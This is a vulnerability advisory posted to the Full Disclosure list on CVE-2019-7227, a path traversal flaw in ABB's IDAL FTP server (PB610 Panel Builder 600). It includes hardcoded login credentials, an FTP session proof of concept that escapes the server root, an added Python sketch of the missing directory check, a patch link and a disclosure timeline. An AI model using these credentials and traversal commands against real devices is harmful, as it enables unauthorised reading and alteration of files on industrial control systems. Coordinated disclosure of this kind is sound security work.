List: full-disclosure
Subject: [FD] XL-19-008 - ABB IDAL FTP Server Path Traversal Vulnerability
From: xen1thLabs <xen1thLabs () darkmatter ! ae>
Date: 2019-06-20 12:12:16
Message-ID: 424c3cc52ee84d35b8b31e2eda03fb31 () darkmatter ! ae
XL-19-008 - ABB IDAL FTP Server Path Traversal Vulnerability
========================================================================
Identifiers
-----------
XL-19-008
CVE-2019-7227
ABBVU-IAMF-1902006
CVSS Score
----------
7.3 (AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N)
Affected vendor
---------------
ABB (new.abb.com)
Credit
------
Eldar Marcussen - xen1thLabs - Software Labs
Vulnerability summary
---------------------
The IDAL FTP server fails to ensure that directory change requests do not change to locations
outside of the FTP server's root directory. An authenticated attacker can simply traverse
outside the server root directory by changing the directory with "cd ..".
Technical details
-----------------
An authenticated attacker can traverse to arbitrary directories on the hard disk and then use
the FTP server functionality to download and upload files. An unauthenticated attacker can take
advantage of the hardcoded or default credential pair exor/exor to become an authenticated
attacker.
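The missing check on directory change requests, sketched as an added example (not code from the advisory or from ABB). The root path, function names and the unconfined `naive_cwd` pattern are assumptions for illustration; `ntpath` is used so Windows path rules apply on any host.

```python
import ntpath

FTP_ROOT = r"C:\ftproot"  # constructed sample root, not the product's real path
POC_ARG = "../../../../../../../../../../../../../../../"  # argument from the PoC


def naive_cwd(root, cwd, arg):
    """Unconfined pattern (assumed): join, normalise, trust the result."""
    return ntpath.normpath(ntpath.join(root, cwd.strip("/"), arg))


def confined_cwd(root, cwd, arg):
    """Resolve a CWD argument against a virtual root.

    Returns (virtual_cwd, real_path), or None if the request must be refused.
    """
    arg = arg.replace("\\", "/")
    # Drive letters, UNC prefixes and NUL bytes never belong in a CWD argument.
    if "\x00" in arg or ":" in arg or arg.startswith("//"):
        return None
    parts = [] if arg.startswith("/") else [p for p in cwd.split("/") if p]
    for comp in arg.split("/"):
        if comp in ("", "."):
            continue
        if comp == "..":
            if not parts:
                return None  # would climb above the FTP root
            parts.pop()
        elif comp.rstrip(". ") != comp:
            return None  # Win32 trims trailing dots/spaces, so ".. " is ambiguous
        else:
            parts.append(comp)
    real = ntpath.normpath(ntpath.join(root, *parts))
    # Defence in depth: the resolved path must still sit under the root.
    root_n = ntpath.normcase(ntpath.normpath(root))
    real_n = ntpath.normcase(real)
    if real_n != root_n and not real_n.startswith(root_n + "\\"):
        return None
    return "/" + "/".join(parts), real


if __name__ == "__main__":
    print("naive   :", naive_cwd(FTP_ROOT, "/", POC_ARG))
    print("confined:", confined_cwd(FTP_ROOT, "/", POC_ARG))
    print("confined:", confined_cwd(FTP_ROOT, "/", "projects/../logs"))
```

This works on path strings only; a server would additionally compare the canonical path reported by the operating system, since junctions and symbolic links inside the root are not resolved here.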
Proof of concept
----------------
```
ftp> open localhost 22
Connected to WIN-542AQUCL4LD.
220 Welcome to IDAL FTP server. READY.
User (WIN-542AQUCL4LD:(none)): exor
331 User name ok, need password.
Password:
230 User successfully logged in.
550 CWD command failed. Directory not found.
ftp> cd ../../../../../../../../../../../../../../../
250 CWD command successful.
ftp> dir
200 PORT command successful.ac
150 Opening ASCII mode data connection for LIST.
drwxrwxrwx 1 0 0 0 Dec 11 05:45 $Recycle.Bin
-rwxrwxrwx 1 0 0 24 Jun 10 2009 autoexec.bat
drwxrwxrwx 1 0 0 0 Dec 11 16:41 Boot
-r--r--r-- 1 0 0 383562 Jul 14 2009 bootmgr
-r--r--r-- 1 0 0 8192 Dec 11 16:41 BOOTSECT.BAK
-rw-rw-rw- 1 0 0 10 Jun 10 2009 config.sys
drwxrwxrwx 1 0 0 0 Jul 14 2009 Documents and Settings
-rw-rw-rw- 1 0 0 -1074274304 Dec 11 12:36 pagefile.sys
drwxrwxrwx 1 0 0 0 Jul 14 2009 PerfLogs
dr-xr-xr-x 1 0 0 0 Dec 11 11:42 Program Files
drwxrwxrwx 1 0 0 0 Dec 11 12:36 ProgramData
drwxrwxrwx 1 0 0 0 Dec 11 05:44 Recovery
-rw-rw-rw- 1 0 0 213 Dec 11 07:23 setup.log
drwxrwxrwx 1 0 0 0 Dec 11 12:26 System Volume Information
dr-xr-xr-x 1 0 0 0 Dec 11 05:44 Users
drwxrwxrwx 1 0 0 0 Dec 11 07:20 Windows
226 Transfer complete.
ftp: 1009 bytes received in 0.01Seconds 100.90Kbytes/sec.
ftp>
```
Affected systems
----------------
PB610 Panel Builder 600, order code: 1SAP500900R0101, versions 1.91 ... 2.8.0.367
Solution
--------
Apply the patches and instructions from vendor:
- ABB PB610 - https://search.abb.com/library/Download.aspx?DocumentID=3ADR010377&LanguageCode=en&DocumentPartId=&Action=Launch
Disclosure timeline
-------------------
04/02/2019 - Contacted ABB requesting disclosure coordination
05/02/2019 - Provided vulnerability details
05/06/2019 - Patch available
17/06/2019 - xen1thLabs public disclosure
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/